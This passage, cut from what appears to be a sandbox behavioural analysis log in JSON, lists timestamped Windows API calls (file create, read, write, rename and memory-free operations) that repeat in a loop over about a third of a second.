"timestamp": "2016-02-16 17:41:51,036", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,036", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,046", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,046", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,046", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,046", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,046", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,046", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,046", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,046", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,046", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,046", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,046", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,046", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,056", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,056", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,056", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,056", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,056", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,056", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,056", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:51,056", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,056", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,056", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,056", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,056", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,066", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,066", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,066", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,066", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,066", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,066", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,066", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,066", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,066", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,066", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,066", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,076", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,076", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,076", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,076", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,076", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,076", 
"api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,076", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,076", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,076", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,076", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,076", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,076", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,076", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,086", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,086", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,086", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,086", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,086", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,086", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,086", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,086", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,086", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,086", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,086", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,096", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,096", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,096", "api": 
"NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,096", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,096", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,096", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,096", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,096", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,096", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,096", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,096", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,096", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,096", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,106", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,106", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,106", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,106", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,106", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,106", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,106", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,106", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,106", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,106", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,106", "api": "MoveFileWithProgressW"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:51,116", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,116", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,116", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,116", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,116", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,116", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,116", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,116", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,116", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,116", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,116", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,116", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,116", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,116", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,116", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,126", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,126", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,126", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,126", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,126", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,126", "api": "NtSetInformationFile"}, {"category": "process", 
"timestamp": "2016-02-16 17:41:51,126", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,126", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,126", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,126", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,136", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,136", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,136", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,136", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,136", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,136", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,136", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,136", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,136", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,136", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,136", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,136", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,136", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,136", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,136", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,146", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,146", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:51,146", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,146", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,146", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,146", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,146", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,146", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,146", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,146", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,146", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,146", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,146", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,146", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,146", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,156", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,156", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,156", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,156", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,156", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,156", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,156", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,156", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,156", 
"api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,156", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,156", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,156", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,166", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,166", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,166", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,166", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,166", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,166", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,166", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,166", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,166", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,166", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,166", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,166", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,166", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,176", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,176", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,176", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,176", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,176", "api": 
"NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,176", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,176", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,176", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,176", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,176", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,176", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,186", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,186", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,186", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,186", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,186", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,186", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,196", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,196", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,196", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,196", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,196", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,196", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,196", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,196", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,196", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:51,196", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,196", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,206", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,206", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,206", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,206", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,206", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,206", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,206", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,206", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,206", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,216", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,216", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,216", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,216", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,216", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,216", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,216", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,216", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,216", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,216", "api": "NtWriteFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:51,216", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,216", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,226", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,226", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,226", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,226", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,226", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,226", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,226", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,226", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,226", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,226", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,226", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,236", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,236", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,236", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,236", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,236", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,236", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,236", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,236", "api": "MoveFileWithProgressW"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:51,236", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,236", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,236", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,246", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,246", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,246", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,246", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,246", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,246", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,246", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,246", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,246", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,246", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,246", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,256", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,256", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,256", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,256", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,256", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,256", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,256", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 
17:41:51,256", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,256", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,256", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,266", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,266", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,266", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,266", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,266", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,266", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,266", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,266", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,266", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,266", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,266", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,266", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,266", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,276", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,276", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,276", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,276", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,276", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,276", 
"api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,276", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,276", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,276", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,276", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,286", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,286", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,286", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,286", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,286", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,286", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,286", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,286", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,286", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,296", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,296", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,296", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,296", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,296", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,296", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,296", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,296", "api": 
"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,296", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,296", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,296", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,296", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,296", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,306", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,306", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,306", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,306", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,306", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,306", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,306", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,306", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,306", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,306", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,306", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,336", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,336", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,336", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,336", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,336", "api": 